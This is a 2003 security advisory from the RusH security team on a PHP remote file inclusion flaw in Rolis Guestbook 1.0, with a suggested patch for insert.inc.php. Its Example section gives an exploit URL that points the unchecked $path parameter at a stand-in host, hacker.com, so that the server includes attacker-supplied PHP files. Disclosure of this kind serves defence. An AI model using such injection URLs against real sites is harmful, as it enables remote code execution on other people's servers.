Rolis Guestbook v1.0 - PHP injection
############ ###################### ####################
################### ######################## #########################
###################### ##### #### #### ##################
#### #### #### ##### ###### ## #####
### ###### ######## ################# ################ ######
### ####### ### ######## ################ ############## ######
### ## ############### #### ######## #######
### ##### ######## ################## #### ######## #######
### ####### ###### ################## #### ###### #######
### ########## #### #### ########### #### ##### ########
### ##### ###### #### ####### ####### #############
######## ########## ###################### ##########
####### ######## ################# ######
##### RusH security team | http://www.rsteam.ru
o----------------------------=[ Advisory #13 ]=----------------------------o
oxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxo
o--------------------------------------------------------------------------o
| Product: Rolis Guestbook |
| Version: 1.0 |
| Vulnerability: PHP injection |
| Vendor: Koch Roland (roli.ko@xxxxxx) |
| OffSite: www.roli.at |
| Vendor status: The vendor has been informed |
o--------------------------------------------------------------------------o
| Date: 16/11/2003 |
| Author: 1dt.w0lf // RsT |
o--------------------------------------------------------------------------o
o-------------------------=[ Problem ]:::
Bug found in file insert.inc.php
Script don't check $path before including files:
<?php
include ($path . "data.inc.php");
include ($path . "header.inc.php");
include($path . "connection_data.inc.php");
[ scip ]
o-------------------------=[ Example ]:::
Example:
www.site.com/rolis_book_path/insert.inc.php?path=http://hacker.com/
where hackers files:
http://hacker.com/data.inc.php
http://hacker.com/header.inc.php
http://hacker.com/connection_data.inc.php
o------------------------=[ Solution ]:::
Edit insert.inc.php:
<?php
include ("path.inc.php"); <-- insert this line
include ($path . "data.inc.php");
...
o--------------------=[ for contacts ]:::
1dt.w0lf - idtwolf[at]pisem[dot]net
RusH team - r00t[at]rsteam[dot]ru
web - www.rsteam.ru
o------------------------------=[ RU ]:::
U can find ru version of this advisory here:
http://rst.void.ru/texts/advisory13.htm
o---------------------------------=[ EOF ]=--------------------------------o